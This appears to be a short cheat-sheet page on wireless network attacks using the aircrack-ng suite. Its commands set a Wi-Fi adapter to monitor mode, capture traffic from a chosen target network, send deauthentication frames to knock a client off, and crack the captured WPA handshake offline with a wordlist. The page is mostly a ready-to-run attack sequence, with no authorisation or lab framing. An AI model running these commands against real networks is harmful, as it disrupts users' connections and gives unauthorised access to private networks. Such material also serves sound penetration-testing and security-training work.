Wireless Attacks

Aircrack

The aircrack suite of tools handles every step of wireless network cracking. In short, the steps are:

Monitoring and Locating Target

Start the adapter monitor mode and kill interfering processes.

sudo airmon-ng check kill
sudo airmon-ng start wlan0

Start monitoring local wireless traffic.

sudo airodump-ng wlan0mon -w mycapturefile # 2.4 GHz band
sudo airodump-ng wlan0mon --band a -w mycapturefile # 5 GHz band

Start monitoring a single BSSID and list clients.

airodump-ng -c [CHANNEL] --bssid [BSSID] -w mycapturefile wlan0mon

Deauthentication Attack

After locating your target BSSID and client MAC, send deauthentication frame(s).

aireplay-ng -0 1 -a [BSSID] -c [CLIENT MAC] wlan0mon

You should have intercepted a WPA handshake from airodump. Crack it offline.

aircrack-ng -w wordlist -b [BSSID] capture.cap

Last updated 7 months ago